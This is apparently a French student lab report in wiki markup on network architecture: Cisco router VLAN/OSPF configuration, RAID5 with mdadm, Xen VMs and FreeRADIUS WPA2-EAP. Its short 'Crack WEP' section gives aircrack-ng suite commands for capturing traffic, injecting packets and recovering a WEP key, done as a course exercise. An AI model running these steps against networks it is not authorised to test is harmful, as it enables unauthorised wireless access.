  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== 3 Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== 3.1 L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
